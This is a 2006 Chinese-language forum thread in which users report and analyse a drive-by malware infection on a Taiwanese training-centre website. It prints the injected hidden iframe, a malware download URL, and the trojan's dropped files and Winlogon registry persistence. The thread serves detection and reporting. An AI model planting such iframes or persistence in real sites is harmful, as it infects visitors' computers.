【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

第 1 頁,共 2 頁 1 2 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 19 筆
  1. #1
    會員
    註冊日期
    2006-10-31
    所在地區
    ADSL
    討論區文章
    5

    【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    昨天同事告知...最後她做了一條有關media player的註冊機碼刪除
    結果導致她登入XP後馬上又登出(安全模式也一樣)..

    我自己的AntiVir 7測試結果http://www.iiiedu.org.tw(進首頁就有,其他部份頁面也有) 的確也是有問題的..

    clamav,trend也有欄到病毒但沒全發現,因為我認為該網址其中iframe連結到www.fxkfxk.com的網站中似乎不只一種惡意程式...

    請大家看看手法是不是跟手機王一樣...請資策會處理似乎沒人理...還是我多心
    這些程式都誤判了 ..(應該不至於吧...)

    總之...org.tw內隱含大陸網站的連結...我覺得很不正常吶...



  2. #2
    會員 yuping 的大頭照
    註冊日期
    2001-10-27
    所在地區
    華電 ADSL 12M/1M
    討論區文章
    391

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    的確有唷
    實際抓下來是個vbscript
    在download一個
    http://www.fxkfxk.com/333/us.exe

  3. #3
    會員
    註冊日期
    2003-12-25
    討論區文章
    114

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    引用 作者:yuping
    的確有唷
    實際抓下來是個vbscript
    在download一個
    http://www.fxkfxk.com/333/us.exe
    nod32抓的到...XD
    Win32/TrojanDownloader.Delf.NJH trojan
    ...
    最近攻擊真多...

  4. #4
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    AVG Anti-Virus FreeEdition 偵測到 "Win32/PEPatch"病毒,會自動從 www.iiiedu.org.tw 網站下載 PDLL.dll 到 C:\Windows\System\資料夾內,請大家用自己的防毒軟體偵測一下吧~

  5. #5
    會員
    註冊日期
    2006-10-31
    所在地區
    ADSL
    討論區文章
    5

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    另一個小小心得分享

    基本上我這邊連上.....iiied.org.tw總共會經過3道防毒程式的"處理"
    已更新至今日的病毒碼
    1.clamav (proxy)
    2.trend (proxy)
    3.AntiVir 7 Free版(本機)

    但1,2無法在 proxy把病毒全排除,最後還好本機防毒夠力...
    再搭配同事使用symantec 10的經驗...看來我明年得評估AntiVir的
    企業解決方案了...



  6. #6
    會員
    註冊日期
    2006-07-05
    所在地區
    ADSL 2M/256
    討論區文章
    398

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧

  7. #7
    會員
    註冊日期
    2006-07-05
    所在地區
    ADSL 2M/256
    討論區文章
    398

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    請有偵測到病毒的人向刑事警察局檢舉吧 http://www.cib.gov.tw/mail/Mail_Report.aspx

  8. #8
    會員 haol 的大頭照
    註冊日期
    2006-06-11
    所在地區
    ADSL 8M/512
    討論區文章
    97

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    引用 作者:hn1271n
    請問卡巴斯基能抓到嗎?麻煩各位大大把病毒樣本傳送給卡巴斯基吧
    卡巴還掃不到,已回報了

  9. #9
    會員
    註冊日期
    2006-03-29
    所在地區
    12MB
    討論區文章
    248

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    以下是這隻木馬的行為:

    1. 首頁被植入
    <iframe src="hxxp://www.fxkfxk.com/333/us.asp" width="0" height="0" scrolling="no" frameborder="0"></iframe>

    2. 檔案 us.asp 是一個 VBScript,它會下載或執行 us.exe。

    3. 執行之後,系統會產生:
    [Added process]
    C:\WINDOWS\svchost.exe

    [DLL Injection]
    C:\WINDOWS\svchost.exe 注入某些執行程序,例如, svchost.exe 等等。
    C:\WINDOWS\system32\PDLL.dll 注入某些執行程序,例如, svchost.exe、explorer.exe 等等。
    C:\WINDOWS\winnt.dll 注入某些執行程序,例如, 瀏覽器等等。
    C:\WINDOWS\winntKey.DLL 注入某些執行程序,例如, svchost.exe 等等。

    [Added service]
    NAME=PigeonServer
    DISPLAY=PigeonServer
    FILE=C:\WINDOWS\winnt.exe

    [Drop Files]
    C:\Program Files\WindowsUpdate\1.exe
    C:\Program Files\WindowsUpdate\2.exe
    C:\WINDOWS\svchost.exe
    C:\WINDOWS\system32\PDLL.dll
    C:\WINDOWS\winnt.dll
    C:\WINDOWS\winnt.exe
    C:\WINDOWS\winntKey.DLL

    [Added Registries]
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\svchost.exe,
    此文章於 2006-11-01 04:08 PM 被 sai7sai 編輯。

  10. #10
    會員 kaspersky 的大頭照
    註冊日期
    2004-08-09
    討論區文章
    1,296

    回覆: 【討論】 請問資策會教育訓練中心網站是否有被植入後門程式?

    Hello,

    us.exe - Trojan-Downloader.Win32.Delf.em - new malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

    --
    Best regards, Leonid Khovansky
    Virus analyst, Kaspersky Lab.
    e-mail: [email protected]
    http://www.kaspersky.com/



類似的主題

  1. 【教學】強迫刪除 Windows 系統內被植入的木馬或後門程式的服務
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2006-11-30, 11:20 AM
  2. 請問資策會 http://www.iiiedu.org.tw/Taipei/這個網站病毒清乾淨了沒
    作者:hn1271n 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 3
    最後發表: 2006-11-24, 03:26 PM
  3. 【閒聊】資策會教學好嗎
    作者:anderson0327 所在討論版:-- 閒 話 家 常 灌 水 版
    回覆: 14
    最後發表: 2005-03-01, 03:58 PM
  4. 這是被植入後門程式嗎?
    作者:vvcvc 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 4
    最後發表: 2003-05-16, 05:18 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •